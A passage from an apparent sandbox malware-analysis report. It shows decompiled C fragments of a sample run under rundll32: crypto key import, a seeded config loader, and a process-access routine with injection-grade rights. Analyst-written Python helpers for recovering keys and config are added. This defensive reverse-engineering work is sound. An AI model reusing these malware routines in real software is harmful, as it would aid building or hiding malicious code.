                				_push(1);          // SDDL_REVISION_1
                				_push(_a4);        // SDDL string (0x4014BD in the recorded call)
                				 *0x4041c8 = 0xc; // executed
                				L00401BA2(); // executed: ConvertStringSecurityDescriptorToSecurityDescriptorA (see APIs)
                				return __eax;
                			}

                APIs
                • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004014BD,00000001,004041CC,00000000), ref: 0040101E
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: DescriptorSecurity$ConvertString
                • String ID:
                • API String ID: 3907675253-0
                • Opcode ID: 37af6f00a77537efc37b23bb70d6860b5876bfe7e8c58cb1fa62402c62a4aca0
                • Instruction ID: 45b1448024c329e41afd5f71cfa77259409b52a3945600e678917a681f6de999
                • Opcode Fuzzy Hash: 37af6f00a77537efc37b23bb70d6860b5876bfe7e8c58cb1fa62402c62a4aca0
                • Instruction Fuzzy Hash: E4C04CF4150301A6E720AF41DD4AF057A6177A4709F60062AF744381E193F91094851D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00401B8C(void* _a4) {
                				char _t2;
                
                				_t2 = RtlFreeHeap( *0x404190, 0, _a4); // executed; heap handle cached in the global at 0x404190
                				return _t2;
                			}

                APIs
                • RtlFreeHeap.NTDLL(00000000,00000030,004017C9,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,00401C96), ref: 00401B98
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: abc11f7c57601308c0ba86a323f0ba82c3b2411acb0f21e52ae6c0c96be0e5ba
                • Instruction ID: 09f3c75a0de5bb76688b38889c6d9a72f08869835e8dc28867f98c0c05acd796
                • Opcode Fuzzy Hash: abc11f7c57601308c0ba86a323f0ba82c3b2411acb0f21e52ae6c0c96be0e5ba
                • Instruction Fuzzy Hash: ACB01271040100EBDA118F40EF08F057E23B7E4701F008030F3042407882318C20FB1C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00401634(long _a4) {
                				void* _t2;
                
                				_t2 = RtlAllocateHeap( *0x404190, 0, _a4); // executed; same heap handle as the RtlFreeHeap wrapper, flags 0 (no zero-fill)
                				return _t2;
                			}

                APIs
                • RtlAllocateHeap.NTDLL(00000000,?,00401C48,00000030,746563F0,00000000), ref: 00401640
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: b0813956299859ea67c94b512f80fe789525e17335b79748474c450a24d7706a
                • Instruction ID: 6ad9520f00aac799c90b5c0c5a3fb88398e4ebc8daf544e6327ea4daa66fc328
                • Opcode Fuzzy Hash: b0813956299859ea67c94b512f80fe789525e17335b79748474c450a24d7706a
                • Instruction Fuzzy Hash: ECB012B1100100ABCA015F41EF08F06BF22B7A4701F004030F3082407883311860EB0C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E04B96601(long _a4) {
                				void* _t2;
                
                				_t2 = RtlAllocateHeap( *0x4b9a2d8, 0, _a4); // executed; the injected module keeps its heap handle at 0x4b9a2d8
                				return _t2;
                			}

                APIs
                • RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 545a12f9fabf7021c2f246db1b2c43958977617248211c190d676cc3604f1f24
                • Instruction ID: 2531b090f2d4db07fb09433d9ae8a17118d498a0f9c4cd2940c164814c75ca49
                • Opcode Fuzzy Hash: 545a12f9fabf7021c2f246db1b2c43958977617248211c190d676cc3604f1f24
                • Instruction Fuzzy Hash: 88B01271100200BBEE014B10DF09F057B21F754700F004016B204410708A370C64FB34
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.773208004.0000000000BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_bb0000_rundll32.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: c413b262abfedbeff8608700365e630dad58d776462ba9f9178ae43d9c4aabf0
                • Instruction ID: c1d21a3b5c6e25b60359f5d5adf197913a40fe7c32d506168c31053592ccdcdf
                • Opcode Fuzzy Hash: c413b262abfedbeff8608700365e630dad58d776462ba9f9178ae43d9c4aabf0
                • Instruction Fuzzy Hash: C64107B49002058FDB04DF59C5587AEBBF0FF48304F1589ADD858AB341D7B6A945CF91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E04B95310(void* __ecx, void* __edx, void* _a4, void* _a8) {
                				void* _t13;
                				void* _t21;
                
                				_t11 =  &_a4;
                				_t21 = 0;
                				__imp__( &_a8); // lstrlen (see APIs): length of the input
                				// Subcall E04B96EB4 (see APIs): CryptAcquireContextW(PROV_RSA_AES = 0x18, CRYPT_VERIFYCONTEXT = 0xF0000000),
                				// CryptImportKey with a 0x1C-byte blob (12-byte PLAINTEXTKEYBLOB header + 16-byte key) and
                				// CryptSetKeyParam(KP_IV = 1): a 128-bit key and an IV are installed before the data is processed.
                				_t13 = E04B96EB4( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed; 0 means success
                				if(_t13 == 0) {
                					_t21 = E04B96601(_a8 + _a8); // RtlAllocateHeap wrapper: buffer of twice the input length
                					if(_t21 != 0) {
                						E04B910E5(_a4, _t21, _t23); // consumes _a4 and the new buffer (subcall not shown in the report)
                					}
                					E04B94130(_a4); // subcall not shown in the report
                				}
                				return _t21;
                			}

                APIs
                • lstrlen.KERNEL32(00000000,00000000,04B96DDD,00000000,?,04B95DEE,00000000,04B96DDD,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B95321
                  • Part of subcall function 04B96EB4: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,04B95335,00000001,04B96DDD,00000000), ref: 04B96EEC
                  • Part of subcall function 04B96EB4: memcpy.NTDLL(04B95335,04B96DDD,00000010,?,?,?,04B95335,00000001,04B96DDD,00000000,?,04B95DEE,00000000,04B96DDD,?,76B5C740), ref: 04B96F05
                  • Part of subcall function 04B96EB4: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 04B96F2E
                  • Part of subcall function 04B96EB4: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 04B96F46
                  • Part of subcall function 04B96EB4: memcpy.NTDLL(00000000,76B5C740,05109600,00000010), ref: 04B96F98
                  • Part of subcall function 04B96601: RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                • String ID:
                • API String ID: 894908221-0
                • Opcode ID: 7f0ba937a9877f1c4d5e550a623273f400c82fe5fdecc1dea6686f32938f8e2d
                • Instruction ID: 1ba90b845c667362a24adfe0afb93e0749edcbef5064827357cc36459169e7c5
                • Opcode Fuzzy Hash: 7f0ba937a9877f1c4d5e550a623273f400c82fe5fdecc1dea6686f32938f8e2d
                • Instruction Fuzzy Hash: 84F03077100119BBDF126E66DC04CDA3FEDDF85354B008072FD198A114DA71ED5597A0
                Uniqueness

                Uniqueness Score: -1.00%
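
                The CryptoAPI chain in the subcall above (CryptAcquireContextW with provider type 0x18 and flags 0xF0000000, CryptImportKey with a 0x1C-byte blob, CryptSetKeyParam with parameter 1) is the standard way to load a raw symmetric key. The Python below is an added example, not code from the sample or from Joe Sandbox: it builds and parses the PLAINTEXTKEYBLOB structure that CryptImportKey expects, which is what an analyst hooking that call would dump to recover the key, and renders the CryptAcquireContext arguments symbolically. The constants come from wincrypt.h; the key bytes are constructed, and the algorithm in the usage (CALG_AES_128) is an assumption based only on the 16-byte key size, which the report does not confirm.

```python
import struct

# Constants from the Windows SDK wincrypt.h.
PROV_RSA_AES = 0x18
PROV_NAMES = {0x01: "PROV_RSA_FULL", 0x0C: "PROV_RSA_SCHANNEL", 0x18: "PROV_RSA_AES"}
ACQUIRE_FLAGS = [(0xF0000000, "CRYPT_VERIFYCONTEXT"), (0x00000008, "CRYPT_NEWKEYSET"),
                 (0x00000010, "CRYPT_DELETEKEYSET"), (0x00000020, "CRYPT_MACHINE_KEYSET"),
                 (0x00000040, "CRYPT_SILENT")]
PLAINTEXTKEYBLOB = 0x08
CUR_BLOB_VERSION = 0x02
KP_IV = 1
CALG_NAMES = {0x6601: "CALG_DES", 0x6603: "CALG_3DES", 0x6801: "CALG_RC4",
              0x660E: "CALG_AES_128", 0x660F: "CALG_AES_192", 0x6610: "CALG_AES_256"}
# BLOBHEADER {BYTE bType; BYTE bVersion; WORD reserved; ALG_ID aiKeyAlg} + DWORD cbKeySize = 12 bytes
HEADER = "<BBHII"


def build_plaintext_key_blob(alg_id: int, key: bytes) -> bytes:
    """Serialise a raw key the way CryptImportKey expects it (PLAINTEXTKEYBLOB)."""
    return struct.pack(HEADER, PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, alg_id, len(key)) + key


def parse_plaintext_key_blob(blob: bytes) -> dict:
    """Parse a blob captured at a CryptImportKey(hProv, pbData, dwDataLen, ...) hook.

    A 0x1C-byte blob, as recorded in this report, is 12 bytes of header plus a 16-byte key.
    Raises ValueError on anything CryptImportKey would reject.
    """
    hdr_len = struct.calcsize(HEADER)
    if len(blob) < hdr_len:
        raise ValueError("blob shorter than the 12-byte header")
    b_type, b_version, _reserved, alg_id, key_len = struct.unpack_from(HEADER, blob, 0)
    if b_type != PLAINTEXTKEYBLOB:
        raise ValueError(f"bType 0x{b_type:02x} is not PLAINTEXTKEYBLOB")
    if b_version != CUR_BLOB_VERSION:
        raise ValueError(f"unexpected bVersion {b_version}")
    if len(blob) != hdr_len + key_len:
        raise ValueError(f"cbKeySize {key_len} does not match blob length {len(blob)}")
    return {"alg_id": alg_id,
            "alg_name": CALG_NAMES.get(alg_id, f"unknown 0x{alg_id:04x}"),
            "key": blob[hdr_len:hdr_len + key_len]}


def describe_acquire_context(prov_type: int, flags: int) -> str:
    """Render CryptAcquireContext's dwProvType/dwFlags as symbolic names for a hook log."""
    names = [PROV_NAMES.get(prov_type, f"provtype 0x{prov_type:x}")]
    rest = flags
    for bit, name in ACQUIRE_FLAGS:
        if (flags & bit) == bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:08x}")
    return " | ".join(names)


if __name__ == "__main__":
    # Constructed sample key; the real key is whatever the sample's memcpy placed in the blob.
    blob = build_plaintext_key_blob(0x660E, bytes(range(16)))
    print(hex(len(blob)), parse_plaintext_key_blob(blob))
    print(describe_acquire_context(PROV_RSA_AES, 0xF0000000))
```

                The size check is the one that matters in practice: a hook that records only dwDataLen can still tell you the key length (0x1C - 12 = 16 bytes), while the full blob gives the algorithm and the key itself.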

                C-Code - Quality: 93%
                			E04B94CAB(void* __ebx, int* __ecx, void* __edx, void* __edi, void* __esi) {
                				int _v8;
                				void* _v12;
                				void* _v16;
                				signed int _t28;
                				signed int _t33;
                				signed int _t39;
                				char* _t45;
                				char* _t46;
                				char* _t47;
                				char* _t48;
                				char* _t49;
                				char* _t50;
                				void* _t51;
                				void* _t52;
                				void* _t53;
                				intOrPtr _t54;
                				void* _t56;
                				intOrPtr _t57;
                				intOrPtr _t58;
                				signed int _t61;
                				intOrPtr _t64;
                				signed int _t65;
                				signed int _t70;
                				void* _t72;
                				void* _t73;
                				signed int _t75;
                				signed int _t78;
                				signed int _t82;
                				signed int _t86;
                				signed int _t90;
                				signed int _t94;
                				signed int _t98;
                				void* _t101;
                				void* _t102;
                				void* _t116;
                				void* _t119;
                				intOrPtr _t122;
                
                				_t119 = __esi;
                				_t116 = __edi;
                				_t104 = __ecx;
                				_t101 = __ebx;
                				_t28 =  *0x4b9a344; // 0x69b25f44: per-build seed, XORed with a constant to form each lookup key
                				if(E04B9210F( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) { // first blob must be at least 0x110 bytes
                					 *0x4b9a374 = _v8;
                				}
                				_t33 =  *0x4b9a344; // 0x69b25f44
                				if(E04B9210F( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) { // second blob is mandatory: return 2 when it is missing
                					_v12 = 2;
                					L69:
                					return _v12;
                				}
                				_t39 =  *0x4b9a344; // 0x69b25f44
                				_push(_t116);
                				if(E04B9210F( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                					L67:
                					HeapFree( *0x4b9a2d8, 0, _v16);
                					goto L69;
                				} else {
                					_push(_t101);
                					_t102 = _v12;
                					if(_t102 == 0) {
                						_t45 = 0;
                					} else {
                						_t98 =  *0x4b9a344; // 0x69b25f44
                						_t45 = E04B94C64(_t104, _t102, _t98 ^ 0x7895433b); // fetch the field keyed by seed ^ constant from the block _t102
                					}
                					_push(_t119);
                					if(_t45 != 0) {
                						_t104 =  &_v8;
                						if(StrToIntExA(_t45, 0,  &_v8) != 0) { // flags 0 (STIF_DEFAULT): decimal only, no hex
                							 *0x4b9a2e0 = _v8; // the same fetch/parse/store pattern repeats for the next five fields
                						}
                					}
                					if(_t102 == 0) {
                						_t46 = 0;
                					} else {
                						_t94 =  *0x4b9a344; // 0x69b25f44
                						_t46 = E04B94C64(_t104, _t102, _t94 ^ 0x219b08c7);
                					}
                					if(_t46 != 0) {
                						_t104 =  &_v8;
                						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                							 *0x4b9a2e4 = _v8;
                						}
                					}
                					if(_t102 == 0) {
                						_t47 = 0;
                					} else {
                						_t90 =  *0x4b9a344; // 0x69b25f44
                						_t47 = E04B94C64(_t104, _t102, _t90 ^ 0x31fc0661);
                					}
                					if(_t47 != 0) {
                						_t104 =  &_v8;
                						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                							 *0x4b9a2e8 = _v8;
                						}
                					}
                					if(_t102 == 0) {
                						_t48 = 0;
                					} else {
                						_t86 =  *0x4b9a344; // 0x69b25f44
                						_t48 = E04B94C64(_t104, _t102, _t86 ^ 0x0cd926ce);
                					}
                					if(_t48 != 0) {
                						_t104 =  &_v8;
                						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                							 *0x4b9a004 = _v8;
                						}
                					}
                					if(_t102 == 0) {
                						_t49 = 0;
                					} else {
                						_t82 =  *0x4b9a344; // 0x69b25f44
                						_t49 = E04B94C64(_t104, _t102, _t82 ^ 0x3cd8b2cb);
                					}
                					if(_t49 != 0) {
                						_t104 =  &_v8;
                						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                							 *0x4b9a02c = _v8;
                						}
                					}
                					if(_t102 == 0) {
                						_t50 = 0;
                					} else {
                						_t78 =  *0x4b9a344; // 0x69b25f44
                						_t50 = E04B94C64(_t104, _t102, _t78 ^ 0x2878b929);
                					}
                					if(_t50 == 0) {
                						L41:
                						 *0x4b9a2ec = 5; // default when the field is absent, unparsable or zero
                						goto L42;
                					} else {
                						_t104 =  &_v8;
                						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) { // the decompiler shows no store of a successfully parsed value on this path
                							goto L41;
                						} else {
                							L42:
                							if(_t102 == 0) {
                								_t51 = 0;
                							} else {
                								_t75 =  *0x4b9a344; // 0x69b25f44
                								_t51 = E04B94C64(_t104, _t102, _t75 ^ 0x261a367a);
                							}
                							if(_t51 != 0) {
                								_push(_t51);
                								_t72 = 0x10;
                								_t73 = E04B9586E(_t72);
                								if(_t73 != 0) {
                									_push(_t73);
                									E04B94408();
                								}
                							}
                							if(_t102 == 0) {
                								_t52 = 0;
                							} else {
                								_t70 =  *0x4b9a344; // 0x69b25f44
                								_t52 = E04B94C64(_t104, _t102, _t70 ^ 0xb9d404b2);
                							}
                							if(_t52 != 0 && E04B9586E(0, _t52) != 0) {
                								_t122 =  *0x4b9a3cc; // 0x5109600
                								E04B97838(_t122 + 4, _t68);
                							}
                							if(_t102 == 0) {
                								_t53 = 0;
                							} else {
                								_t65 =  *0x4b9a344; // 0x69b25f44
                								_t53 = E04B94C64(_t104, _t102, _t65 ^ 0x3df17130);
                							}
                							if(_t53 == 0) {
                								L59:
                								_t54 =  *0x4b9a348; // 0x56d5a8
                								_t22 = _t54 + 0x4b9b252; // 0x616d692f: dword at the resolved address, ASCII "/ima"
                								 *0x4b9a370 = _t22; // built-in default string, used when the field is absent
                								goto L60;
                							} else {
                								_t64 = E04B9586E(0, _t53);
                								 *0x4b9a370 = _t64;
                								if(_t64 != 0) {
                									L60:
                									if(_t102 == 0) {
                										_t56 = 0;
                									} else {
                										_t61 =  *0x4b9a344; // 0x69b25f44
                										_t56 = E04B94C64(_t104, _t102, _t61 ^ 0xd2079859);
                									}
                									if(_t56 == 0) {
                										_t57 =  *0x4b9a348; // 0x56d5a8
                										_t23 = _t57 + 0x4b9b79e; // 0x6976612e: dword at the resolved address, ASCII ".avi"
                										_t58 = _t23; // built-in default string, used when the field is absent
                									} else {
                										_t58 = E04B9586E(0, _t56);
                									}
                									 *0x4b9a3e0 = _t58;
                									HeapFree( *0x4b9a2d8, 0, _t102); // release the config block; the heap handle lives at 0x4b9a2d8
                									_v12 = 0; // success
                									goto L67;
                								}
                								goto L59;
                							}
                						}
                					}
                				}
                			}

                APIs
                • StrToIntExA.SHLWAPI(00000000,00000000,?,04B9A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04B94D50
                • StrToIntExA.SHLWAPI(00000000,00000000,?,04B9A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04B94D82
                • StrToIntExA.SHLWAPI(00000000,00000000,?,04B9A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04B94DB4
                • StrToIntExA.SHLWAPI(00000000,00000000,?,04B9A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04B94DE6
                • StrToIntExA.SHLWAPI(00000000,00000000,?,04B9A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04B94E18
                • StrToIntExA.SHLWAPI(00000000,00000000,?,04B9A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04B94E4A
                • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 04B94F49
                • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 04B94F5D
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID: Uet
                • API String ID: 3298025750-2766386878
                • Opcode ID: 9d288262242faf33dcbd17ec88bd5600145ecdc71d8f044110775100b937e704
                • Instruction ID: 648503414acb28780b5f24f864259a2c190d1439cdb7e24e2b452053f2999740
                • Opcode Fuzzy Hash: 9d288262242faf33dcbd17ec88bd5600145ecdc71d8f044110775100b937e704
                • Instruction Fuzzy Hash: FF818D70A18605BBDF24EBB4DAC496B77EDEB8C6007284DB6A001D7104FA39FD469720
                Uniqueness

                Uniqueness Score: -1.00%
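
                E04B94CAB above is a configuration loader: for each field it derives a key as the seed at 0x4b9a344 XORed with a hard-coded constant, fetches the field from the block in _t102 through E04B94C64, parses it with StrToIntExA (flags 0, so decimal only) and stores the result in a global. One field falls back to 5, and two string fields fall back to built-in strings. The Python below is an added example, not code from the sample or from Joe Sandbox, that mirrors that precedence so the same rules can be applied to a dumped config. Assumptions: the config block is modelled as a dict keyed by the derived 32-bit value, because E04B94C64's real lookup is not shown in the report; the successfully parsed value of the default-5 field is assumed to be stored, which the decompilation does not show; StrToIntExA follows its documented STIF_DEFAULT behaviour; and only the first four bytes of the two default strings are visible in the dump, so the example carries just those.

```python
SEED = 0x69B25F44  # observed at 0x4b9a344 in this dump

# (XOR constant from the decompilation, destination global). Integer fields are parsed with
# StrToIntExA and stored only on success; an absent or unparsable field leaves the global untouched.
INT_FIELDS = [
    (0x7895433B, 0x4B9A2E0),
    (0x219B08C7, 0x4B9A2E4),
    (0x31FC0661, 0x4B9A2E8),
    (0x0CD926CE, 0x4B9A004),
    (0x3CD8B2CB, 0x4B9A02C),
]
DEFAULT5_FIELD = (0x2878B929, 0x4B9A2EC)   # becomes 5 when absent, unparsable or zero
STR_FIELDS = [(0x3DF17130, 0x4B9A370), (0xD2079859, 0x4B9A3E0)]
# Only the first four bytes of the built-in defaults are visible in the dump
# (0x616d692f and 0x6976612e, little-endian); the rest of each string is not in the report.
STR_DEFAULTS = {0x4B9A370: b"/ima", 0x4B9A3E0: b".avi"}


def field_key(seed: int, const: int) -> int:
    """Key passed to E04B94C64: seed ^ constant, as a 32-bit value."""
    return (seed ^ const) & 0xFFFFFFFF


def str_to_int_ex_a(s: bytes):
    """Emulate StrToIntExA(s, STIF_DEFAULT, &out).

    Leading whitespace and an optional sign are accepted, then decimal digits up to the
    first non-digit. Returns the 32-bit result, or None where the API returns FALSE
    (no digits at all). Without STIF_SUPPORT_HEX, b"0x10" parses as 0.
    """
    i = 0
    while i < len(s) and s[i] in b" \t\r\n":
        i += 1
    sign = 1
    if i < len(s) and s[i] in b"+-":
        sign = -1 if s[i] == ord("-") else 1
        i += 1
    start = i
    while i < len(s) and 0x30 <= s[i] <= 0x39:
        i += 1
    if i == start:
        return None
    return (sign * int(s[start:i])) & 0xFFFFFFFF


def apply_config(entries: dict, seed: int = SEED) -> dict:
    """Return {global address: value} the way E04B94CAB fills its globals.

    `entries` maps field_key(...) -> raw bytes and stands in for the block E04B94C64 searches
    (assumption: the real lookup structure is not shown in the report).
    """
    globals_ = {}
    for const, addr in INT_FIELDS:
        raw = entries.get(field_key(seed, const))
        if raw is None:
            continue
        value = str_to_int_ex_a(raw)
        if value is not None:
            globals_[addr] = value
    const, addr = DEFAULT5_FIELD
    raw = entries.get(field_key(seed, const))
    value = str_to_int_ex_a(raw) if raw is not None else None
    globals_[addr] = value if value else 5   # assumption: a parsed non-zero value is stored
    for const, addr in STR_FIELDS:
        raw = entries.get(field_key(seed, const))
        globals_[addr] = raw if raw is not None else STR_DEFAULTS[addr]
    return globals_


if __name__ == "__main__":
    # Constructed config entries, keyed the way the loader looks them up.
    sample = {
        field_key(SEED, 0x7895433B): b"60",
        field_key(SEED, 0x219B08C7): b" -1",
        field_key(SEED, 0x31FC0661): b"0x10",   # parses as 0 under STIF_DEFAULT
        field_key(SEED, 0x2878B929): b"0",      # zero triggers the default of 5
    }
    for addr, value in sorted(apply_config(sample).items()):
        print(f"0x{addr:08x} = {value!r}")
```

                Two edge cases worth keeping in mind when reading a dumped config: a hex-looking value such as 0x10 is stored as 0 because the loader never passes STIF_SUPPORT_HEX, and a negative decimal survives as its two's-complement DWORD.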

                C-Code - Quality: 100%
                			E00401BA8() {
                				void* _t1;
                				unsigned int _t3;
                				void* _t4;
                				long _t5;
                				void* _t6;
                				intOrPtr _t10;
                				void* _t14;
                
                				_t10 =  *0x4041b0;
                				_t1 = CreateEventA(0, 1, 0, 0); // manual-reset, initially non-signalled, unnamed
                				 *0x4041bc = _t1;
                				if(_t1 == 0) {
                					return GetLastError();
                				}
                				_t3 = GetVersion(); // low byte = major, next byte = minor, high word = build number
                				if(_t3 != 5) { // version gate: the non-5 branch depends on a flag (_t14) the decompiler did not recover
                					L4:
                					if(_t14 <= 0) {
                						_t4 = 0x32; // ERROR_NOT_SUPPORTED: version gate failed (reached for 5.0)
                						return _t4;
                					} else {
                						goto L5;
                					}
                				} else {
                					if(_t3 >> 8 > 0) {
                						L5:
                						 *0x4041ac = _t3;
                						_t5 = GetCurrentProcessId();
                						 *0x4041a8 = _t5;
                						 *0x4041b0 = _t10;
                						_t6 = OpenProcess(0x10047a, 0, _t5); // SYNCHRONIZE | PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE | PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD, on its own PID
                						 *0x4041a4 = _t6;
                						if(_t6 == 0) {
                							 *0x4041a4 =  *0x4041a4 | 0xffffffff; // fall back to (HANDLE)-1, the current-process pseudo-handle
                						}
                						return 0;
                					} else {
                						_t14 = _t3 - _t3;
                						goto L4;
                					}
                				}
                			}

                APIs
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401C2C), ref: 00401BB7
                • GetVersion.KERNEL32 ref: 00401BC6
                • GetCurrentProcessId.KERNEL32 ref: 00401BE2
                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401BFB
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.772858037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000003.00000002.772848945.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772865794.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772877043.0000000000405000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.772888672.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                Similarity
                • API ID: Process$CreateCurrentEventOpenVersion
                • String ID: @Met`fet MetTet
                • API String ID: 845504543-3757152079
                • Opcode ID: 8234f8e7df4543caa7745a79373efb6b178ee26295734d7fe9e31f51aaa282f2
                • Instruction ID: a33e46edd0baa2e15e724dcf49771effb33b7f8f81d0fa99f28ae2a62cd4a38d
                • Opcode Fuzzy Hash: 8234f8e7df4543caa7745a79373efb6b178ee26295734d7fe9e31f51aaa282f2
                • Instruction Fuzzy Hash: 0DF03CB05853019BFB209F78BE097963FA4A796712F044136E741FA2F4E7B895C18B9C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00402565(long _a4) {
                				intOrPtr _v8;
                				intOrPtr _v12;
                				signed int _v16;
                				short* _v32;
                				void _v36;
                				void* _t57;
                				signed int _t58;
